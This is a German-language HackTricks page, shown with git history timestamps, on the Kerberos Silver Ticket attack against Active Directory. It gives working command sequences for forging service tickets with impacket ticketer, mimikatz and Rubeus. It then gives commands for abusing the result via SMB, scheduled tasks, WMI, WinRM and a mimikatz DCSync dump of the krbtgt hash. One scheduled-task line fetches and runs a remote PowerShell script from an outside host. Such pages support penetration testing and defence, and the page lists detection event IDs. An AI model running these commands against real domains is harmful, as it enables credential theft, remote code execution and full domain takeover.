hacktricks/windows-hardening/active-directory-methodology/silver-ticket.md

173 lines
9 KiB
Markdown
Raw Normal View History

2024-02-10 15:36:32 +00:00
# Silberticket
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary>Lernen Sie das Hacken von AWS von Grund auf mit <a href="https://training.hacktricks.xyz/courses/arte">htARTE (HackTricks AWS Red Team Expert)</a>!</summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2024-01-02 18:28:04 +00:00
2024-02-10 15:36:32 +00:00
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die [ABONNEMENTPLÄNE](https://github.com/sponsors/carlospolop)!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie die PEASS-Familie, unsere Sammlung exklusiver NFTs
- Treten Sie der Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks- und HackTricks Cloud-GitHub-Repositories senden
2022-04-28 16:01:33 +00:00
</details>
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
2022-05-24 00:07:19 +00:00
2024-02-10 15:36:32 +00:00
Wenn Sie an einer Karriere im Hacking interessiert sind und das Unhackbare hacken möchten - **wir stellen ein!** (fließendes Polnisch in Wort und Schrift erforderlich).
2022-04-28 16:01:33 +00:00
2022-05-24 00:07:19 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
2024-02-10 15:36:32 +00:00
## Silberticket
2024-02-10 15:36:32 +00:00
Der Angriff mit dem **Silberticket** beinhaltet die Ausnutzung von Diensttickets in Active Directory (AD)-Umgebungen. Diese Methode basiert auf dem **Erlangen des NTLM-Hashes eines Dienstkontos**, wie z.B. eines Computerkontos, um ein Ticket Granting Service (TGS)-Ticket zu fälschen. Mit diesem gefälschten Ticket kann ein Angreifer auf bestimmte Dienste im Netzwerk zugreifen und sich als beliebiger Benutzer ausgeben, wobei in der Regel administrative Privilegien angestrebt werden. Es wird betont, dass die Verwendung von AES-Schlüsseln zur Fälschung von Tickets sicherer und weniger erkennbar ist.
2024-02-10 15:36:32 +00:00
Für das Erstellen von Tickets werden verschiedene Tools verwendet, abhängig vom Betriebssystem:
2024-02-10 15:36:32 +00:00
### Unter Linux
```bash
2024-02-08 03:06:37 +00:00
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
2024-02-10 15:36:32 +00:00
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
2024-02-08 03:06:37 +00:00
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
```
2024-02-10 15:36:32 +00:00
### Auf Windows
```bash
2024-02-08 03:06:37 +00:00
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"
2024-02-08 03:06:37 +00:00
# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>
2024-02-08 03:06:37 +00:00
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```
2024-02-10 15:36:32 +00:00
Der CIFS-Dienst wird als häufiges Ziel für den Zugriff auf das Dateisystem des Opfers hervorgehoben, aber auch andere Dienste wie HOST und RPCSS können für Aufgaben und WMI-Abfragen ausgenutzt werden.
## Verfügbare Dienste
| Diensttyp | Dienst-Silbertickets |
| ----------------------------------------- | -------------------------------------------------------------------------- |
| WMI | <p>HOST</p><p>RPCSS</p> |
| PowerShell-Remoting | <p>HOST</p><p>HTTP</p><p>Je nach Betriebssystem auch:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>In einigen Fällen können Sie einfach nach WINRM fragen:</p> |
| Geplante Aufgaben | HOST |
| Windows-Dateifreigabe, auch psexec | CIFS |
| LDAP-Operationen, einschließlich DCSync | LDAP |
2022-05-24 00:07:19 +00:00
| Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> |
2024-02-10 15:36:32 +00:00
| Goldene Tickets | krbtgt |
2021-01-04 22:37:21 +00:00
2024-02-10 15:36:32 +00:00
Mit **Rubeus** können Sie alle diese Tickets mit dem Parameter anfordern:
2021-01-04 22:37:21 +00:00
* `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
2024-02-10 15:36:32 +00:00
### Ereignis-IDs für Silbertickets
2024-02-08 03:06:37 +00:00
2024-02-10 15:36:32 +00:00
* 4624: Kontoanmeldung
* 4634: Kontoabmeldung
* 4672: Administratoranmeldung
2024-02-08 03:06:37 +00:00
2024-02-10 15:36:32 +00:00
## Missbrauch von Diensttickets
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
In den folgenden Beispielen nehmen wir an, dass das Ticket unter Verwendung des Administrator-Kontos abgerufen wird.
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
### CIFS
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
Mit diesem Ticket können Sie über **SMB** auf den Ordner `C$` und `ADMIN$` zugreifen (sofern sie freigegeben sind) und Dateien auf einen Teil des Remote-Dateisystems kopieren, indem Sie einfach Folgendes tun:
2021-01-04 23:12:42 +00:00
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
```
2024-02-10 15:36:32 +00:00
Sie können auch eine Shell im Host erhalten oder beliebige Befehle mit **psexec** ausführen:
2021-01-04 23:12:42 +00:00
2022-08-13 23:06:40 +00:00
{% content-ref url="../ntlm/psexec-and-winexec.md" %}
[psexec-and-winexec.md](../ntlm/psexec-and-winexec.md)
2022-05-24 00:07:19 +00:00
{% endcontent-ref %}
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
### HOST
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
Mit dieser Berechtigung können Sie geplante Aufgaben in entfernten Computern erstellen und beliebige Befehle ausführen:
2021-01-04 23:12:42 +00:00
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
2021-01-04 23:12:42 +00:00
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
2022-05-24 00:07:19 +00:00
### HOST + RPCSS
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
Mit diesen Tickets können Sie **WMI im Zielsystem ausführen**:
2021-01-04 23:12:42 +00:00
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
wmic remote.computer.local list full /format:list
2021-01-04 23:12:42 +00:00
```
2024-02-10 15:36:32 +00:00
Finde **weitere Informationen zu wmiexec** auf der folgenden Seite:
2021-01-04 23:12:42 +00:00
2022-08-13 23:06:40 +00:00
{% content-ref url="../ntlm/wmicexec.md" %}
[wmicexec.md](../ntlm/wmicexec.md)
2022-05-24 00:07:19 +00:00
{% endcontent-ref %}
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
### HOST + WSMAN (WINRM)
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
Mit WinRM-Zugriff auf einen Computer kannst du **darauf zugreifen** und sogar eine PowerShell erhalten:
2021-01-04 23:12:42 +00:00
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
2024-02-10 15:36:32 +00:00
Überprüfen Sie die folgende Seite, um **weitere Möglichkeiten zur Verbindung mit einem Remote-Host über WinRM** zu erfahren:
2021-01-04 23:12:42 +00:00
2022-08-13 23:06:40 +00:00
{% content-ref url="../ntlm/winrm.md" %}
[winrm.md](../ntlm/winrm.md)
2022-05-24 00:07:19 +00:00
{% endcontent-ref %}
2021-01-04 23:12:42 +00:00
{% hint style="warning" %}
2024-02-10 15:36:32 +00:00
Beachten Sie, dass **WinRM aktiv und im Hörmodus** auf dem Remote-Computer sein muss, um darauf zugreifen zu können.
2021-01-04 23:12:42 +00:00
{% endhint %}
2022-05-24 00:07:19 +00:00
### LDAP
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
Mit diesem Privileg können Sie die DC-Datenbank mithilfe von **DCSync** dumpen:
2022-05-24 00:07:19 +00:00
```
2021-01-04 23:12:42 +00:00
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
2024-02-10 15:36:32 +00:00
**Erfahren Sie mehr über DCSync** auf der folgenden Seite:
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
## Referenzen
2024-02-08 03:06:37 +00:00
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
2022-05-24 00:07:19 +00:00
{% content-ref url="dcsync.md" %}
[dcsync.md](dcsync.md)
{% endcontent-ref %}
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
2021-01-04 23:12:42 +00:00
2024-02-10 15:36:32 +00:00
Wenn Sie an einer **Hackerkarriere** interessiert sind und das Unhackbare hacken möchten - **wir stellen ein!** (_fließendes Polnisch in Wort und Schrift erforderlich_).
2022-04-28 16:01:33 +00:00
2022-05-24 00:07:19 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Erfahren Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 15:36:32 +00:00
Andere Möglichkeiten, HackTricks zu unterstützen:
2024-01-02 18:28:04 +00:00
2024-02-10 15:36:32 +00:00
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
2022-04-28 16:01:33 +00:00
</details>